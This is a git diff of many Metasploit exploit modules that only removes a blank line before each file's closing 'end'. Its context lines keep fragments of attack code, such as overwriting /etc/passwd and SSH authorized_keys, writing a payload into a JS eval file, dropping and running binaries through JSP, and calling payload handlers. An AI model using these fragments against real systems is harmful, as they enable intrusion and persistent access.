a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb index de9b7d3d40..28b5a89155 100644 --- a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb @@ -249,5 +249,4 @@ cp /etc/persistent/#{username}/passwd /etc/passwd cp /etc/persistent/#{username}/authorized_keys /etc/dropbear/authorized_keys EOF end - end diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index de8b867c0c..4b7041b8bc 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote ::IO.select(nil, nil, nil, 0.5) disconnect end - end diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index dd682d141b..fc877889af 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -219,5 +219,4 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => data }) end - end diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index baaf02f5a9..b63ecc0c85 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -144,5 +144,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 7a8c634768..b05f300114 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 3faaefea0b..32d0650bd1 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -218,5 +218,4 @@ EOF ^ end - end diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 13d975858d..634430fb8a 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -108,5 +108,4 @@ function FillHeap() { </html> EOF end - end diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 1ec2fe76c6..39d3965fd2 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -123,5 +123,4 @@ EOS send_response_html(cli, page, header) handler(cli) end - end diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index c765c54079..d23cf14f4b 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -167,6 +167,5 @@ class MetasploitModule < Msf::Exploit::Remote def generate_jar() return @jar_data end - end diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 74a1a763e9..4f2484d23c 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -221,5 +221,4 @@ EOF return @jar_data end - end diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index eb750bf9d4..52df7b785d 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -176,5 +176,4 @@ class MetasploitModule < Msf::Exploit::Remote | return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 75d46f6db4..3fdb0c941e 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote html += "</applet></body></html>" return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 3832cf1631..8842f756f0 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Remote html += %Q|</applet></body></html>| return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index fa25c8e81d..fbedd52e7e 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote html += "</applet></body></html>" return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index b7f4037fd8..d259aa5b02 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -124,5 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote html += %Q|</applet></body></html>| return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 9ceb3a1d04..2c0cf89f8b 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -134,5 +134,4 @@ document.write('<embed object="Exploit.ser" type="application/x-java-applet;vers EOF return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 12ecc7c40a..a65f0af347 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote html += %Q|</applet></body></html>| return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 5a68e56dbe..626449dc33 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -133,5 +133,4 @@ class MetasploitModule < Msf::Exploit::Remote | return html end - end diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 21d35e44d7..8dfdaf3f49 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Exploit::Remote | return html end - end diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index 9f0d43c14b..be5d14ded2 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -116,5 +116,4 @@ class MetasploitModule < Msf::Exploit::Remote html += "</applet></body></html>" return html end - end diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 2e4f398e7a..0fe98a899b 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -103,5 +103,4 @@ class MetasploitModule < Msf::Exploit::Remote html += "</applet></body></html>" return html end - end diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 2c07016297..d83c396cc3 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -218,5 +218,4 @@ EOF return @jar_data end - end diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index 9d14f3ba81..b4b9120ad9 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote return jar.pack end - end diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index 2415ab9de5..337965bdef 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote html += "</applet></body></html>" return html end - end diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index b51085f771..4c626dace3 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -166,6 +166,5 @@ class MetasploitModule < Msf::Exploit::Remote def generate_jar() @jar_data end - end diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index 6cba699ce2..eaa012af83 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote </html> | end - end diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index ab1ac38520..c8a159301d 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -131,5 +131,4 @@ blank_iframe_window.eval( ENDJS end - end diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 0d78fe6e64..4477073b3f 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response_html(cli, content, headers) handler(cli) end - end diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index dde1cfccf0..42d46c324b 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -209,5 +209,4 @@ c.main(null); return res end - end diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index 03a1fcfd78..b8835de13a 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -197,5 +197,4 @@ class MetasploitModule < Msf::Exploit::Remote res end - end diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index b58b85e9a2..cfaf440c26 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -511,5 +511,4 @@ EOF pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 7deb6c1091..0de4654013 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -42,5 +42,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") end - end diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index c49b2839e2..6ac7c8d39d 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -145,5 +145,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create(content) end - end diff --git a/modules/exploits/multi/fileformat/office_word_macro.rb b/modules/exploits/multi/fileformat/office_word_macro.rb index 9e73b887f0..abd2306835 100644 --- a/modules/exploits/multi/fileformat/office_word_macro.rb +++ b/modules/exploits/multi/fileformat/office_word_macro.rb @@ -283,5 +283,4 @@ class MetasploitModule < Msf::Exploit::Remote docm = pack_docm file_create(docm) end - end diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 0f3d042522..227597e8bb 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(zip.pack) end - end diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index 4c647fb5d4..d6b665a321 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eef47e72e9..3f82d1f677 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -99,7 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end =begin diff --git a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb index 2971799b04..6125df709a 100644 --- a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb +++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb @@ -221,5 +221,4 @@ class MetasploitModule < Msf::Exploit::Remote def zip_filename @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' end - end diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 28b7f871a2..ab0fafe374 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -131,5 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 3ee82f4e34..43a7b65a8a 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -322,5 +322,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'") end end - end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index e1b08b44d9..f4d4a4a39b 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -147,5 +147,4 @@ class MetasploitModule < Msf::Exploit::Remote break if res.code == 200 end end - end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 5d05b2b748..8a00dcb671 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -271,5 +271,4 @@ EOF } ) end - end diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index b5d3db0c62..d40c226b0b 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index 862a7dcbcf..4b9961d0ed 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -68,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote end end - end =begin diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 52c3a2e442..23f4c940c4 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index eb0c56c5a7..9e638d8676 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index dbaef6ce03..334c69b2b2 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index 320b945037..bec91811a7 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -160,5 +160,4 @@ class MetasploitModule < Msf::Exploit::Remote return res end - end diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 339e769e5f..1717d2a57a 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -344,5 +344,4 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - end diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index ae0a3de41f..2bd7375ed3 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 3a6163e39a..bda82c3c4b 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -733,5 +733,4 @@ EOT stream end - end diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 12d8ed79a5..356adc3730 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -356,5 +356,4 @@ class MetasploitModule < Msf::Exploit::Remote end nil end - end diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 993cd0b658..d5158d3dad 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -605,5 +605,4 @@ class MetasploitModule < Msf::Exploit::Remote def print_error(msg='') super("#{peer} - #{msg}") end - end diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 877613d384..79614087bf 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Exploit::Remote rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/exploits/multi/http/magento_unserialize.rb b/modules/exploits/multi/http/magento_unserialize.rb index 557346ba0f..f03e658fb0 100644 --- a/modules/exploits/multi/http/magento_unserialize.rb +++ b/modules/exploits/multi/http/magento_unserialize.rb @@ -395,7 +395,6 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end =begin diff --git a/modules/exploits/multi/http/metasploit_static_secret_key_base.rb b/modules/exploits/multi/http/metasploit_static_secret_key_base.rb index d4dfa0e7d5..77e7e25fe1 100644 --- a/modules/exploits/multi/http/metasploit_static_secret_key_base.rb +++ b/modules/exploits/multi/http/metasploit_static_secret_key_base.rb @@ -306,5 +306,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb b/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb index 867b8cb94a..1a73260091 100644 --- a/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb +++ b/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb @@ -279,5 +279,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index e8ea0bf8b7..5b24ea5127 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote def rot13(str) str.tr! "A-Za-z", "N-ZA-Mn-za-m" end - end diff --git a/modules/exploits/multi/http/oracle_ats_file_upload.rb b/modules/exploits/multi/http/oracle_ats_file_upload.rb index 0791830d2e..bd42b771c1 100644 --- a/modules/exploits/multi/http/oracle_ats_file_upload.rb +++ b/modules/exploits/multi/http/oracle_ats_file_upload.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote def jsp_path jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename end - end diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 10ba07a5e9..47d76b873a 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -223,5 +223,4 @@ class MetasploitModule < Msf::Exploit::Remote def rand_php_ini_true Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)]) end - end diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb index 0bfffa1978..0ce2264600 100644 --- a/modules/exploits/multi/http/php_utility_belt_rce.rb +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote } ) end - end diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index f031e1e34b..c0f81678e4 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("%s" % res.body) if datastore['CMD'] end - end diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 42aae607dc..1d6124765b 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -271,5 +271,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 924bb58545..333e68ced3 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -342,5 +342,4 @@ SH res end - end diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 086e9bf098..d9199e6b5b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -138,5 +138,4 @@ out.println("Path:" + System.getProperty("server.webapp.root")); jsp end - end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 6dae6c0a0a..6e555bd454 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -273,5 +273,4 @@ class MetasploitModule < Msf::Exploit::Remote def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end - end diff --git a/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb b/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb index 89a7869392..acb055c8b9 100644 --- a/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb +++ b/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb @@ -360,5 +360,4 @@ class MetasploitModule < Msf::Exploit::Remote try_set_target(os) do_backdoor_sqli(os, sid, uid) end - end diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 6924f29cbc..79a3b2e6dd 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -166,5 +166,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 2c0871ba84..301c3c8430 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index eb0228ce18..85436cb601 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote end handler end - end diff --git a/modules/exploits/multi/http/struts2_content_type_ognl.rb b/modules/exploits/multi/http/struts2_content_type_ognl.rb index b947089217..42fcdd3a7e 100644 --- a/modules/exploits/multi/http/struts2_content_type_ognl.rb +++ b/modules/exploits/multi/http/struts2_content_type_ognl.rb @@ -168,7 +168,6 @@ class MetasploitModule < Msf::Exploit::Remote send_struts_request(ognl, extra_header: [exe].pack("m").delete("\n")) end - end =begin diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index efd6d31d03..f3338fd641 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -299,6 +299,5 @@ class MetasploitModule < Msf::Exploit::Remote } modify_class_loader(properties) end - end diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 168682f59f..ce8d1a9d7c 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -190,5 +190,4 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Appears end end - end diff --git a/modules/exploits/multi/http/struts_dmi_exec.rb b/modules/exploits/multi/http/struts_dmi_exec.rb index 5b529b558e..bae4331e05 100644 --- a/modules/exploits/multi/http/struts_dmi_exec.rb +++ b/modules/exploits/multi/http/struts_dmi_exec.rb @@ -197,5 +197,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/struts_dmi_rest_exec.rb b/modules/exploits/multi/http/struts_dmi_rest_exec.rb index 7ad7b4ead4..95fb176200 100644 --- a/modules/exploits/multi/http/struts_dmi_rest_exec.rb +++ b/modules/exploits/multi/http/struts_dmi_rest_exec.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index af8b640460..104f7e97b3 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end end - end diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 014f213472..713a9646f7 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -206,5 +206,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb 